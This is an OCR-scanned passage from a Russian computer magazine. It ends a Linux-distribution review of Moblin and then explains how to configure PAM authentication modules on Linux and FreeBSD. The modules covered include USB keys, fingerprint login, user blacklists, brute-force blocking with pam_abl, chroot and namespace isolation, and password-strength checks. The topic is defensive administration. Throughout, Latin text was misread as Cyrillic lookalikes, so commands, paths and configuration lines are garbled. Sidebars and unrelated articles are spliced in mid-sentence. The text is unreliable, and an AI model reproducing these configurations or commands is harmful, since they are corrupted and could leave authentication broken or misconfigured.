вана новая графическая оболочка, построенная на библиотеке 
СШие г ( сіииег-ргоіесі.ога і. что поддерживает ОрепОІ_и 0реп0І_Е5 
(реализация для встроенных устройств, ѵѵѵѵѵѵ.кЬгопоз.огд/орепдІез І. 
Изначально С Шиег разрабатывался в рамках проекта ОрепебНапб, 
который в прошлом году приобрела ІЫеІ. Самое главное, что СІиНег 
использует СІ_Х-расширение стандартного сервера Х.огд, поэтому 
в отличие от Апбгоіб, в МоЫіп можно запускать и обычные настоль- 
ные приложения Ыпих. В итоге, у пользователя этой системы недо- 
статка в программах быть не должно. Дистрибутив поставляется в 
виде загрузочного ітд-образа размером 700 Мб, предназначенного 
для копирования на II 5 В -флешку или записи на СО. 

Копирование на флешку можно произвести при помощи бб. Также 
проект предлагает свой скрипт ітаде-ѵѵгііег ( діСтоЫіп.огд/сдіСсді/ 
тоЫіп-ітаде-сгеаІог/рІаіп/ітаае-ѵѵгіІег ]. Предусмотрена работа в 
І_іѵе-режиме без установки на хард и сетевая загрузка (пеІЬооі]. 
Рабочий стол базируется на ХРСЕ, но интерфейс несколько отлича- 
ется от привычного. В верхней части расположена панель, обеспе- 



чивающая доступ к основным задачам и приложениям. При запуске 
приложения создается специальная зона, что-то вроде виртуаль- 
ного рабочего стола. Пользователь может создавать несколько 
таких зон, переключаясь во время работы между ними. Доступен 
предпросмотр окон запущенных приложений в каждой зоне. При 
закрытии всех окон зоны та автоматически уничтожается. Пользо- 
ватель может отобрать некоторые приложения (нажав на «булавку» 
в правом углу] в Еаѵоигбе АррІісаРюпз. 

Специальная панель т_ 2 опе содержит календарь, органайзер и 
информацию с сайтов вроде Тѵѵіиег и ЕазіЫпп. Здесь же находятся 
ссылки на файлы, которые открывались последними. 

В отдельной вкладке расположены ссылки на мультимедийный 
контент (аудио, видео и рисунки]. Файлы, к которым обращались 
последними, будут в самом верху списка. Система индексации 
Віскіеу ( тоЫіп.ога/ргоіесЫ/ЬіскІеу ] позволила реализовать поиск 
по метаданным. 

В состав МоЫіп включен веб-браузер, построенный на движке 
Могіііа Сеско, медиаплеер, ІМ-клиент ЕтраіФу (поддерживает 
баЬЬег, Сіаік, I СО, М5Ы, ІРС, 5аІЫ] и другие приложения для работы 
в Сети. Хочется отметить наличие скриптов МоЫіп Ітаде Сгеаіог 2 
(МІС2], которые позволяют собрать свою версию МоЫіп. 

ЗАКЛЮЧЕНИЕ 

Каждый дистрибутив ориентирован на своего пользователя, под 
нужды которого и заточен. Выбирать лучший или худший в такой си- 
туации, я считаю, неправильно. А вот подобрать решение по вкусу, 
ты теперь, наверняка, сможешь, т 
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Модули аутентификации на все случаи жизни 



Сегодня система подключаемых модулей аутентификации РАМ 
поставляется в комплекте практически с любым ІІІМІХ’ом. Но не- 
многие знают, что с ее помощью можно получить просто безгра- 
ничный контроль над юзерами и способами входа в систему. 

К примеру, организовать аутентификацию по отпечаткам пальцев 
и ІІ5В-ключам, поместить пользователей в сЬгооі-окружение и 

защитить хост от брутфорс-атак. 



РЕООКА11 «ЬЕОЖОАБ» 
ВВЕДЕНИЕ В РАМ 

Мы уже рассматривали РАМ (РІиддаЫе 
АіЛЬепЬсаЬоп Мосіиіез] в одном из предыдущих 
выпусков журнала [речь идет о статье «Сис- 
тема безопасности РАМ изнутри », опуб- 
ликованной в февральском номере □□ за 
2006 год, — Прим.ред.) Для тех, кто пропустил, 
объясню в двух словах. Система подключаемых 
модулей аутентификации представляет собой 
специальную модульную библиотеку, возмож- 
ности которой может использовать любое при- 
ложение, осуществляющее аутентификацию 
и/или авторизацию пользователей. Хороший 



пример — системная утилита /Ьіп/Іодіп, отвеча- 
ющая за вход пользователя в ОС. До появления 
РАМ она должна была сама находить пользо- 
вателя в базеМс/раззѵѵсІ и сверять хеш вве- 
денного им пароля с хранящимся в базе хешем. 
Сегодня все эти действия осуществляет РАМ, а 
/Ьіп/Іодіп только вызывает ее из своего кода и 
проверяет возвращаемый статус. Но это пустяк, 
потому что настоящая мощь РАМ заключается 
в ее модульности, благодаря которой можно 
легко изменить используемый метод аутен- 
тификации (хочешь входить по отпечаткам 
пальцев — нет ничего проще!) и авторизации 
(пользователь должен уйти в сЬгооІ: после логи- 



на — легко!) путем редактирования всеголишь 
одного конфигурационного файла. 

РАМ используетза крепленные за приложени- 
ями конфиги для получения информации отом, 
какие модули следует использовать для а^ен- 
тификации/авторизации пользователя. Все они 
располагаются в каталогеМс/рат.сІ. Рассмот- 
рим пример одного из них — файл/еію/рат.сі/ 
Іодіп, закрепленный за утилитой /Ьіп/Іодіп : 

# ѵі /еіс/рат.сі/іодіп 

аиЫі зи^^ісіепС рат_зе1^ . зо 

по_магп 

аиЫі іпсіисіе зузСет 
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ззЬс1[б892] : Раііесі раззмогсі Еог гооС Егот 192.168,0.103 рогЬ 40235 ззЬ2 
55ЬЩ6892] : Раііесі раззиогсі Еог гооЬ Егот 192.168.0.103 рогЬ 40235 ззЪ2 
5 бМ[ 68923 : (рат_ипіх) 1 тоге аиЬЪепЫсаЫоп Еаііидге; 1одпате= иісі=0 еиісі=0 Ыу=з; 
гизег= гЬозЬ=192 , 168 . О , 103 изег=гооЬ 

ззЬсІ [69003 : (рат_ипіх) аиЕЬепЫсаЫоп Еаііиге; Іодпате® иісі®0 еиіс1=0 ^^у®ззЬ гизе] 
гЬозЬ=192 . 168 . 0 . 103 изег=гооР 

ззЬс![б900]: Раііесі раззиогсі Еог гооъ Егот 192.168.0.103 рогР 40236 ззЪ2 
рат_аЫ [ 6909] :В1оскіпд ассезз Егот 192.168.0.103 Со зегѵісе ззЬ, изег гоос 



РЕЗУЛЬТАТ РАБОТЫ МОДУЛЯ РАМ_АВЬ 



ассоипк гедиізіке рат_зесигекку . 
зо 

ассоипк гедиігесі раш_по1одіп . зо 

ассоипк іпсіисіе зузкет 

зеззіоп іпсіисіе зузкет 

раззиогсі іпсіисіе зузкет 

Формат конфигурационного файла РАМ был 
подробно описан в вышеназванной статье, 
поэтому сейчас я скажу только о том, что су- 
ществует четыре стека РАМ-модулей, модули 
каждого из которых вызываются поочередно. 
Первый столбец как раз и указывает на ис- 
пользуемый стек: 

• аи*Ь — сюда помещаются модули, проводя- 
щие аутентификацию; 

• ассоипі — модули, определяющие, можно ли 
пользователю зайти; 

• зеззіоп — выделение ресурсов для пользо- 
вателей (например, монтирование домашнего 
каталога); 

• раззѵѵогсі — модули, обеспечивающие 
обновлениеучетной записи пользователя и 
его пароля (этот стек использует команда /изг/ 
Ьіп/раззѵѵсІ). 

Второй столбец — это флаг, который определяет, 
что делать в случае (не)успешной отработки 
модуля. Третий столбец — имя модуля, четвер- 
тый — его аргументы (также модуль может и меть 
конфигурационный файл, располагающийся 
в каталоге /еІс/зесигТу). Обрати внимание на 
особую директиву іпсіисіе, которая не вписыва- 
ется в общий синтаксис и позволяет подключать 
другой конфиг (чтобы не дублировать содержи- 
мое). В нашем случае для каждого стека указан 
включаемый файл зузіют (также располо- 
женный в каталогеМс/рат). Это специфика 
РгееВЭО; Ыпих-дистрибутивы ОеЬіап и ІІЬипІи 
используют для тех же целей файлы соттоп-* 
(соттоп-аиШ, соттоп-зеззіоп ит.д.), а ОепФо 
и Мапбгіѵа — зузіют-*. В одном из этих файлов 
ты обязательно найдешь строку с запуском РАМ- 
модуля, ответственного за поиск пользователя в 
базе/еію/раззѵѵсі и сравнениехешей: 

аиШі гедиігесі рат_ипіх.зо по_магп 
кгу_іігзк_разз пиііок 

Уберем ее, и двери захлопнутся, больше в 
систему не войдешь. 



Атеперь немного магии. Какя уже говорил, 
изменяя несколько строкв конфигурационных 
файлах, мы можем сделать с методом аутен- 
тификации и авторизации все, что угодно (в 
рамках возможностей доступных модулей, ко- 
нечно). Возьмем, к примеру, файл Мс/рат.сІ/ 
зи, стек модулей аи1:Ь которого выглядиттак: 

йѵі/еіс/рат.сі/зи 

аибк зиііісіепб рат_гообок . зо 
по_члагп 

аикЪ. зиііісіепк рат_зе1і . зо по_ 
члагп 

аикк гедиізіке рат_дгоир. 
зо по_члагп дгоир=ілДіее1 гоок_оп1у 
іаі1_заіе 

аикЬ. іпсіисіе зузкеш 

Сначала вызывается модуль рат_гоо1юк, кото- 
рый проверяет II Ю пользователя, запустивше- 
го приложение, и успешно завершается, если 
он равен нулю. Все остальные модули в этом 
случае пропускаются (флагзиііісіепі:). Если 
первый модульзавершился неудачно (поль- 
зователь не гооі) , стартует модуль рат_5е1і, 
который проверяет, совпадаетли II Ю вызыва- 
ющего пользователя с ІІЮ’ом пользователя, 
для которого осуществляется авторизация. 
Если это так, остальные модули не запускаются 
(поясню на примере: если пользовательѵазуа 
делает «зи ѵазуа», модуль возвращает «да», и 
зи выполняется успешно, не спрашивая паро- 
ля). Далее с помощью модуля рат_дгоир про- 
исходит проверка на членство вызывающего 
пользователя в группе ѵѵбееі, и, если это не та к, 
пользователя отфутболивают (флаг гедиізке). 

В конце выполняются модули, помещенные 
в стек а иіЬ в файле Мс/рат.б/зузіет (вызов 
рат_ипіх, сверяющего пароль). 

Приведу несколько примеров. Хочешь сделать 
так, чтобы зи не смог пользоваться никто? 
Тогда удали все эти строки и впиши на их 
место «аиІН зиНісіепІ: рат_бепу.зо». Модуль 
рат_бепу — это аналог команды іа Ізе. Он 
всегда выполняется неудачно, поэтомузи 
не сможет воспользоваться ни один пользо- 
ватель, включая гооЕ Антипод ему — модуль 
рат_регтіІ, всегда исполняющийся удачно. 
Запиши в/еіс/рат.б/зи строку « а и 1 И зиііісіепі: 
рат_регтіЕзо», и зи смогут использовать все, 



кому не лень, не вводя пароль. 

Но все это игрушки в сравнении стем, что нас 
ждет дальше. 

ІІ5В-КЛЮЧИ 
И ОТПЕЧАТКИ ПАЛЬЦЕВ 

Стандартная комплектация Итих-РАМ и 
ОрепРАМ уже включает в себя несколько 
модулей аутентификации, которые следует 
помещать в стекаФЬ. Это, например, модуль 
рат_диезЕ который позволяет использовать 
для аутентификации специальные гостевые 
аккаунты, рат_кризегз, впускающий поль- 
зователя только если его имя присутствует 
в файле /еі с/іі ризе гз, или рат_5есиге1іу, 
разрешающий суперпользователю логиниться 
лишьс терминалов, которые помечены как 
зесиге в файле/еію/куз (или просто перечис- 
лены в файлеМс/зесигеНу в Иі п их) . Все они 
задействованы в системах аутентификации 
различных приложений, но для нас особого 
интереса не представляют. 

В большинстве систем среди штатных модулей 
есть такие, которые позволяют производить 
аутентификацию с помощью ІІЭВ-ключей, 
смарт-карт и даже отпечатков пальцев. Возь- 
мем, к примеру, модуль рат_изб. Он считывает 
ключ с ІІ5В-брелка и на его основе делает 
выводо правомочности пользователя войти 
в систему. Вставил брелок — вошел, вынул — 
система заблокирована. Интересно? Тогда 
вперед. 

В портах ЕгееВЭО рат_изб нет, поэтому все 
описанное ниже пригодится только пользо- 
вателям Еіп их (примеры даны для ОеЬіап/ 
ІЭбипО). Установим рат_изб и нужные для его 
настройки утилиты: 

# арС-деС іпзбаіі ІіЬрат-изЪ 

ратизЪ-СооІз 

Подключим ІІ5В-брелок и запустим ратизб- 
сопТ чтобы добавить флешку в конфигураци- 
онный файл: 

# рашизЬ-сопі --аскі-сіеѵісе лю- 
бо е_имя 

Утилита попросит выбрать нужное устройство, 
раздел, используемый для хранения ключа, и 
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ИСТОРИЯ РАМ 



V РАМ сізпС ічііміЧап 1ы сМ-н зегѵісе 



Идея РАМ принадлежит 5ші Місгозузгетз, двое сотрудников которой разрабо- 
тали первую версию системы в 1995 году. Впервые РАМ появился в Зоіагіз 2.3, 
а сегодня входит в поставку большинства ИИІХ-подобных ОС, включая Ііпих, 
РгееВЗЭ, №іВ5Э и Мае 05 X. АРІ системы РАМ был включен в спецификацию 
Х550. Это стандартизовало РАМ и привело к появлению нескольких совмести- 
мых между собой реализаций системы: 

• Оригинальная реализация, поставляемая в составе Зоіагіз; 

• Ііпих-РАМ, используемый в дистрибутивах Ііпих; 

• ОрепРАМ, разработанный для В5Э-систем. 
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КОНФИГУРАЦИОННЫЙ ФАЙЛ РАМ ДЛЯ 
СЕРВИСА55Н0 
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•Авторство системы 
Ыпих-РАМ принад- 
лежит компании 
РесІ Наі, впервые 
включившей ее 
в дистрибутив РесІ Наі 
3.0.4 (1996 год]. 

• Руководство проек- 
та РгееВЗЭ перевело 
ОС на ОрепРАМ толь- 
ко с выходом пятой 
ветки. «Четверка» 
использовала Ыпих- 
РАМ. 

• До появления идеи 
разделения настроек 
РАМ в каталоге /еіе/ 
рат.сі все приложе- 
ния использовали 
единый конфигура- 
ционный файл /е1;с/ 
рат.сопР 
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Ссылка на статью 
«Система безо- 
пасности РАМ 
изнутри»: ѵѵѵѵѵѵ. 
хакер.ги/тадагіпе/ 
ха/086/1 1 2/1 .азр . 



спросит о том, следует л и за носить устройство в конфигура- 
ционный файл. Следует ответить «да», то есть «у». 

Добавим пользователей, которые смогут войти в систему с 
помощью этого ІІ5В-брелка: 

# рашизЬ-сопР --абб-изег гооС 

Выбираем уже добавленный в конфигбрелок, нажимаем «у» 
и проверяем правильность произведенных настроек: 

# рашизЬ-сйеск гоок 

На этом настройка рат_изб завершена. Осталось добавить 
рат_изЬ в стекаиІЬ необходимых приложений и насладить- 
ся результатом. 

Не будем утомлять себя редактированием всех конфигура- 
ционных файлов РАМ, закрепленныхза каждым приложе- 
нием, и внесем изменения во включаемый файл /еЫ/рат.б/ 



соттоп-аЫЬ. Для этого откроем его в редакторе и перед 
строкой, содержащей имя рат_ипіх.50, добавим строку 
« а и 1 И зийісіепі: рат_изЬ.50». Теперь любое приложение, 
конфигурационный файл РАМ которого включает в себя 
сотпгюп-аиіЬ, будет пытаться аутентифицировать пользо- 
вателя с помощью ключа, записанного на ІІ5В-брелок, и 
только в случае неудачи запросит пароль. 

С отпечатками пальцев дело обстоит еще проще. Уже год как 
существуетзамечательный проект ІргіпІ [ ѵѵѵѵѵѵ. геасбѵаіесі. 
пеШргіпДѵѵікі/Маіп Раде ), смысл которого в разработке 
унифицированной библиотеки для работы с различными 
сканерами отпечатков (подключаемых к ЫІ5В- порту] и 
набора утилит для работы с ней. Кроме прочего, в комплект 
утилит входит и нужный нам модуль рат_1ргіп1:. 

Связка ІіЫргіпІ и рат_1ргіп1:уже включена по умолчанию 
в новые релизы ІІЬипШ и Ребога и доступна через систему 
портов РгееВВР (/изг/рогЫ/зесигку/рат^ргіпІ;]. Поэто- 
му вручную устанавливать ничего не потребуется, а для 



СТАНДАРТНАЯ ПОСТАВКА ОРЕЫРАМ ВКЛЮЧАЕТ В СЕБЯ БОЛЬШОЕ 
КОЛИЧЕСТВО МОДУЛЕЙ 
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раш_ипіх. 50. 4 

рат_ипіх.зо0 -> рат_ипіх. зо. 4 
рат_Еаср1из . зо . 4 

рат_гасріиз.50@ -> рат_Саср1из . зо. 4 
рат_5зЬ. зо. 4 

рат_ззЬ.зо0 -> раш_ззЬ.50.4 
раш_зе1Г . зо . 4 

рат_зеИ.зо0 -> раш_зе1Г. зо. 4 
рат_зесигессу . зо . 4 

рат_зесигеЕ*:у . зо0 -> рат_зесигеП:у . зо. 4 
рат_гооЕок . зо . 4 

рат_гооЕок. зо0 -> рат_гооЕок.зо.4 
рат_гЬозС5 .зо.4 

рат_гЬозЕз . 500 -> рат_гЬозЕз . 50 . 4 
рат_гасііи5 .50.4 

рат_гасііиз . зо0 -> рат_гасііи5.зо.4 
раш_регтіс . эо. 4 

рат_регтіі: . 500 -> рат_регтіі: . зо . 4 
рат_раззѵсідс . зо . 4 

рат_раззжкіс . зо0 -> раш_раззѵ/сіяс. зо. 4 
раш__оріеассезз . зо . 4 

рат_оріеассезз.5о0 -> рат_оріеассезз . зо. 4 
рат_оріе . зо . 4 

рат_оріе.зо0 -> рат_оріе . зо . 4 
рат_по1одіп . зо . 4 

рат_по1одіп.зо0 -> рат_по1одіп.зо.4 
рат_1одіп_ассезз . зо . 4 

раш_1одіп_ассезз . 500 -> раш_1одіп_ассе55 . зо. 4 
рат_1азЕІод . зо . 4 

рат_1азЕІод. зо0 -> рат_1азСІод . зо . 4 
рат_кзи . зо . 4 

раш__кзи.5о0 -> рат_кзи.зо.4 
раш_кгЬ5.зо.4 
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ДЛЯ КАЖДОГО СЕРВИСА СВОЙ КОНФИГУРАЦИОННЫЙ ФАЙЛ РАМ 

настройки необходимо выполнить всего два шага. Первый 
— создать слепок пальца с помощью следующей команды: 

$ рат_ПргіпС_епго11 --епгоІІ-Ніпдег б 

Цифра 6 означает большой палец правой руки. Система 
іргіпі: нумерует пальцы обеих рук слева направо, от одного 
до десяти, так что 1 — это мизинецлевой руки, а 8 — средний 
палец правой. 

Второй шаг. Добавить рагтИргіпІ: в стекаиіЬ необходимых 
приложений. Для этого открываем уже знакомый нам /еіс/ 
рапп.сІ/соттоп-аіНЬ (или/еіс/рат.сі/зузіют во РгееВЭО) 
и вставляем в начало строку «а іПЬ зиНісіепі рат_фргіпП 
во». При необходимости указываем флаг гециігеб вместо 
зиНісіепІ, чтобы без отпечатка вообще нельзя было войти 
(но не рекомендую этого делать; современные потребитель- 
ские системы распознавания отпечатков пальцев далеки от 
совершенства]. 

ЧЕРНЫЕ СПИСКИ, БЕСПАРОЛЬНЫЕ 
ПОЛЬЗОВАТЕЛИ И АЛЬТЕРНАТИВ- 
НЫЕ БАЗЫ ПАРОЛЕЙ 

Процесс помещения пользователей в черные и белые 
списки до появления РАМ обычно превращался в какое-то 
шаманство, сопровождаемое многочисленными экспери- 
ментами, а конечная цель достигалась за счет использова- 
ния костылей. Сегодня пользователям и системным адми- 



нистраторам живется намного легче: существует несколько 
РАМ-модулей, позволяющих реализовать блэклистинг и 
автоматизацию входа пользователя в систему. 

Возьмем, к примеру, модуль рат_Д51:б1е (доступный только 
в пакете Ыпих-РАМ]. С его помощью легко настроитьсис- 
темубеспа рольного входа пользователей. Просто добавь 
следующую строку в конфигурационный РАМ-файл нужного > ІПІО 
приложения и запиши беспарольных пользователей в файл • В ОрепВЭО под- 
/еіс/изегз.аііоѵѵ: держка РАМ полно- 

стью отсутствует. 

аиСЪ зиППісіепС раш_1ізС^і1е . зо іСеш=изег 

зепзе=а11ом Еі1е=/еСс/изегз . аііом опегг=Паі1 • С помощью РАМ 

невозможно реализо- 

Немного изменив строку, можно добиться запрещения вать КегЬегоз. 

входа пользователей: 

аиСЪ. зиППісіепС раш_1ізС^і1е . зо іСеш=изег 
зепзе=с!епу Пі1е=/еСс/изегз . сіепу опегг=:Еаі1 

Причем, в качестве значения опции Нет можно исполь- 
зовать также Ну, изег, гЬозС гизег, дгоир, збеіі. Это дает 
возможность запрещать/позволять вход не только на осно- 
ве имен пользователей, но и именитерминала, с которого 
происходит вход, имени удаленного хоста/пользователя, 
группы ит.д. 

Другой похожий модуль называется рат_ассезз. Он 
использует более гибкий и сложный формат конфигураци- 
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РогИ: рат_тузд1-0 . 7 . гі 

РаНЬ : /изг/рогНз/зесигіНу/раш-туздІ 

ІпЕо: А рат шосіиіе Гог аиПЬепПісаПіпд ѵіНЬ МуЗОЬ 

МаіпН: апсіегзѲЕгееВЗО.огд 

В-сіерз: аиНосопГ-2 . 62 аиНосопГ-ѵгаррег-20071109 аиНотаке-1 . 4 . б_5 аиНотаке-ѵгаррег-20071109 

1іЬНоо1-1 .5.26 т4-1.4.11,1 туздІ-сІіепН-5 . О . 67_1 рег1-5.8.8_1 

К-сіерз: шуздІ-сІіепН-5 . 0 . 67_1 

НШ: Ьннр: //рат-шу5д! . зоигсеГогде . пен/ 



РогН: рат-рдздІ-0 . 6 . 3_1 

РаНЬ : /изг/рогНз/зесигіНу/рат-рдздІ 

ІпГо: А рат тосіиіе Гог аиНЬепНісаНіпд ѵіНЬ РозНдгеЗОЬ 

МаіпП: сЬіпзап@ГгееВ50.огд 

В-сІерз: деННехН-0 . 17_1 1іЫсопѵ-1 . 1 1 1 тЬазЬ-0.9.9 розНдгездІ-сІіепН-8 . 2 . 9 

К-сіерз: деННехН-0 . 17_1 1іЬісопѵ-1 . 11_1 тЬазЬ-0.9.9 розНдгездІ-сІіепН-8 . 2 . 9 
Ш: ЬННр: //гоигсеГогде .пеН/ргозесНз/рат-рдздІ/ 

Рогп : рат_аЫ-0 .2.3 

РаНЬ : /изг /рогНз/зесигіну/рат_аЫ 

ІпГо: ВІаскІізНіпд гезропзіЫе Гог гереаНесі Гаііесі аиНЬепНісаНіоп аППетрПз 

МаіпН: ргеЬогѲдтаіІ . сот 

В-сіерз: с1Ь42-4 . 2 . 52_5 
К-сіерз: сіЬ42-4 . 2 . 52_5 

ШИ: ЬППр: //ѵплгѵ. ЬехНеп . пеП/рат_аЫ/ 



РогН: рат_аГ-1 . О . 1_2 

РаНЬ: /изг/рогН5/зесигіНу/рат_аГ 

ІпГо: Апні-ЬгиНеГогсе РАМ тосіиіе 

МаіпН: зПаз0ЕгееВ5О.огд 

В-сіерз : 

К-сіерз : 

ШИ: ЬППр: //тЬзсі.тзк. ги/зНаз/рат_аГ . Ьнті 

МНОГИЕ МОДУЛИ РАМ ПОРТИРОВАНЫ ВО РКЕЕВ50 



онного файла и предназначен для помещения в стекассоипі: (проверка, 
может л и пользователь войти, осуществляется уже после того, как он 
представился, то есть ввел правильные логин и пароль). Модульудоб- 
но использовать в связке с ззб для выставления за дверь неугодных. 
Для этого надо поместить модуль в стек ассоипЕ «ассоипі гедиігесі 
рат_ассе55.50» и создать файл Мс/зесигбу/ассезз.соп^ примерно с 
таким содержимым: 

# ѵі /еіс/зесигііу/ассезз.соп^ 

+ : АЫг : 192.168.1 
+ : доос1_диу : АЬЬ 
- : АЫі : АЬЬ 

Это означает, что получить доступ через ззЬ могут все из подсети 
1 92.1 68.1 .0 и парень с логином доосІ_диу. Остальные идут лесом. 

На просторах всемирной паутины можно найти и более простой 
модуль рат_1оскои1 ( озіабс.сот/рат-іоскоиі ). Он позволяет пере- 
числить имена неугодных пользователей прямо в конфигурационном 
файле РАМ: «аиіЬ гедиізбе раігщІоскоиПзо изег=Ьаб_диу». 

Для организации беспарольной системы входа пользователей с кон- 
соли удобно использовать модуль рат_аІгесІуІоддесІіп [ ііѵа-еѵзееѵ. 
пагосі.ги/розіх/рапп аігеасіѵіодаесііп ). Он запрашивает пароль только 
в случае, если пользователь еще не залогинился в другой консоли 
(идеальное решение, когда используешь сразу несколько консолей, 
переключаясь между ними с помощью <АІ1+Рх>). Для настройки 
просто помещаем следующие две строки на самый верх стека аіЛЬ (в 
начало файла): 

аиСЪ. гедиігесі /ІіЪ/ зесигіСу /рат_зесигеССу . зо 

аиСЪ. зиііісіепС /ІіЬ/ зесигіСу /рат_а1геас!у1оддес1іп . зо 

по_гооС 



Возвращаясь кспискам пользователей, нельзя неупомянутьодовольно 
интересном модуле рагтщрѵѵсібіе ( срЬоіЬа.пеДзо^уѵаге/рат руусШІе ). 
Его задача — предоставить приложениям альтернативную базу пользо- 
вателей и паролей, которую они смогут использовать вместо системного 
файла /еіс/раззѵѵсі. Это своего рода плагин для тех приложений и демо- 
нов, которые не способны вести подобную базу самостоятельно. Яркий 
пример: ми нимал истинный РТР-сервер ѵзКрсІ. Запусти его от неприви- 
легированного пользователя, и клиенты не смогут пол учить до ступ ксер- 
веру. Выход: использовать раггщрмсИИе, который будет вести отдельный 
файл логинов и паролей специально для ѵз^рсі. Для использования 
достаточно добавить следующие две строки в начало /еІс/рат.сІ/ѵзГСрсІ: 

аиЫг гедиігесі рат_рѵ\гсН:і1е . зо рчжііііе /изг/ІосаІ/еСс/ 

ѵзіСрсІ/ѵзіЦрсІ. изегз 

ассоипС гедиігесі рат_рѵ^с1іі1е . зо рмсііііе /изг/іосаі/ 

еСс/ѵзіСрсІ/ѵзіІірсі. изегз 

И добавить пользователей в базу с помощью утилиты сбрѵѵсШІе 
( есІірзе.сЬе.исЕас.га/сЬрѵѵббІе ) — либо руками заполнив его строка- 
ми вида: «логин:М05-хеш-пароля». 

На закуску я оставил вкуснейший модуль рат_аЫ ( Ьехіеп.пеІ/ 
рат аЫ ]. самостоятельно ведущий и обновляющий черные списки 
пользователей-брутфорсеров. Это отличная портабельная между 
ІЛЧІХ’ами альтернатива блэклистингу на основе правил брандмауэ- 
ра. Модуль вычисляеттех, кто слишком настойчиво пытается пройти 
аутентификацию, и блокирует аккаунт или вызывающий хост на 
определенное время. Для настройки открываем /еіс/рат.б/ззбб и 
добавляем в начал о строку «аиіб гециігеб рат_аЫ.зо сопЛд=/еІс/ 
зесигііу/раггщаЫ.сопІ 1 ». По умолчанию модуль настроен на блоки- 
ровку аккаунта. Это правильно, если твой хост подвергся распреде- 
ленному брутфорсу, но вызовет проблемы для легальных пользова- 
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телей, которые попытаются войти в систему сразу после проведения 
безуспешной попытки «взлома». В обычной ситуации для борьбы со 
скрипт-кидди лучше настроить блокировку на основе имени вызыва- 
ющего хоста. Поэтому открываем файл /еІс/зесигіІу/рат-аЫ.сопІ и 
пишем в него: 

# ѵі /еІс/5есигіІу/рат_аЫ.соп* 

// Черный список 
Ьоз1_с1Ъ=/ѵаг/1іЪ/аЪ1/1юз1з . сІЪ 
// Блокировка сроком на два дня 
Ьюз1_ригде=2с1 

// Блокировка любого хоста после 10 неудачных попыток 
за 1 час 

Ьоз1_ги1е=* : 10/ІЪ. 

ПРОСТРАНСТВА ИМЕН, 
АВТОМОНТИРОВАНИЕ, СНВООТ 

Как было сказано выше, стек РАМ-модулей зеззіоп предназначен 
для модулей, подготавливающих окружение для только что вошед- 
шего пользователя. Это может быть любое действие, связанное с 
выделением или ограничением доступных пользователям ресурсов. 
Наиболее показательный пример — модуль рат_1ітііз из пакета 
Ы п их- РАМ (ноне 0 реп РАМ]. Он ограничивает ресурсы приложений 
вошедшего пользователя на основе конфигурационного файла /еіс/ 
зесигіІуАітіІз.сопІ 

Если говорить о сторонних разработках, то в первую очередь сле- 
дуетупомянуть полезнейший модуль рат_сбгоо1 ( зоигсеіогде.пеі/ 
рпэіесІз/рат-сЬгооі ). единственная задача которого — помещать 
вошедших пользователей в песочницу. Модуль незаменим, когда 
требуется организация зЬеІІ- , Ар- или какого-либо другого хостинга 
и любых конфигураций, предусматривающих вход в систему сомни- 
тельных лиц. Модуль очень прост в использовании. Для настройки 
достаточно выполнить две команды: 

# есію 'зеззіоп гедиігеб рат_скгоо1 . зо ' » /еіс/рат.б/ 
ззк 

# есію 'ѵазуа /изг/скгоо! ' » /еіс/зесигііу/скгооі . 
сопі 

Все, теперь ѵазуа, вошедший с помощью ззб- клиента, будет поме- 
щен в каталог/изг/сбгооі и не сможет из него выбраться. 

На втором месте в рейтинге — модуль рат_ткботебіг из пакета 
Ыпих-РАМ, просто создающий домашний каталог для прошедшего 
аутентификацию пользователя. 

Поначалу полезность модуля может показаться сомнительной, но 
администраторы гетерогенных сетей, состоящих вперемешку из 
машин ѴѴіпбоѵѵз/ІЛМІХ, ценят его дороже своих потертых джинсов. 
Дело втом, что втаких сетях принято использовать Асііѵе 0 і гесіогу 
для хранения учетных данных пользователей, коих может быть не 
одна сотня. Вместо того чтобы создавать многочисленные каталоги 
для каждого пользователя, зарегистрированного в АО, они просто 
выполняют приведенную ниже команду на всех 11 N IX- машинах и 
удаляются в серверную порезаться в «контру»: 

# есію 'зеззіоп гедиігеб раш_тк1ютебіг . зо зке1 = /е!с/ 
зкеі/ итазк=027' >> /еіс/рат. б/ соттоп- зеззіоп 

Модуль обычно используется в связке с модулем рат_ѵѵіпЬіпсІ, 
осуществляющим аутентификацию в АО, или с рат_1с1ар, аутентифи- 
цирующим пользователей, используя сервер ЮАР. 

Почетное третье место за ни мает за вязанный на возможностях Ыпих- 
ядра модуль рат_патезрасе. Его задача — незаметное создание 
изолированной копии общедоступного каталога (Атр, например] 
для каждого пользователя. Другими словами, вошедший пользова- 
тель получает доступ только к своей версии каталога Атр и не видит 



файлов других пользователей. Нужно это для борьбы с методами 
взлома, основанными на использовании состояний гонок (га се 
со псі Шоп], символических ссылок и просто для ограждения возмож- 
ного нарушителя от любых файлов легальных пользователей. 

Модуль использует простой конфигурационный файл /еіс/зесигііу/ 
патезрасе.сопідля принятия решения отом, какие каталоги должны быть 
подменены. Вот простая инструкция для изолирования каталога Атр: 

# ткбіг /Ітр-іпзі 

# сЬтоб 0 /Ітр-іпзі 

# есію "/Ітр /Ітр-іпзі/ изег гооі" » /еіс/зесигііу/ 
патезрасе . сопі 

# есію "зеззіоп гедиігеб рат_патезрасе . зо " >> /еіс/ 
рат. б/ соттоп- зеззіоп 

Результат: индивидуальный каталог Атр для каждого пользователя, 
за исключением гооНа (на самом деле файлы будут храниться в ката- 
логе Атр-іпзі/юзер). Конфигурационная строка для изолирования 
каталога /боте (чтобы злоумышленник не смогувидеть и получить 
доступ к каталогам пользователей) должна выглядеть так: 

$НОМЕ $НОМЕ/$БЗЕК. іпзі/ изег гооі 

АВТОМАТИЗИРОВАННАЯ ПРОВЕРКА 
ПАРОЛЕЙ НА СТОЙКОСТЬ 

Плагины РАМ-стека раззѵѵогсі вызываются каждый раз, когда 
пользователь меняет реквизиты своей учетной записи. По- 
этому туда принято помещать любые модули, так или иначе 
связанные с проверкой введенных пользователем данных. 

Один из нем ногих та ких модулей называется рат_сгаск1іб и 
предназначен для проверки паролей на стойкость с помощью 
следующих техник: 

• Отброс слишком коротких паролей; 

• Запрещение пароля, совпадающего или очень похожего на преды- 
дущий; 

• Запрещение пароля, отличающегося от предыдущего только регис- 
тром символов (ІІпіхОісІ, ІІпІхОЮ); 

• Запрещение «паролей-перевертышей» (старый пароль: ипіхоісі, 
НОВЫЙ: СІІОХІпи]; 

• Принуждение пользователя включать в пароль символы верхнего 
регистра, числа и другие знаки. 

Практически единственное место, куда можно включить вызов рат_ 
сгаскііб — файл /еіс/рат. б/раззѵѵсі, используемый командой раззѵѵб. 
Вот его содержимое после внесения изменений: 

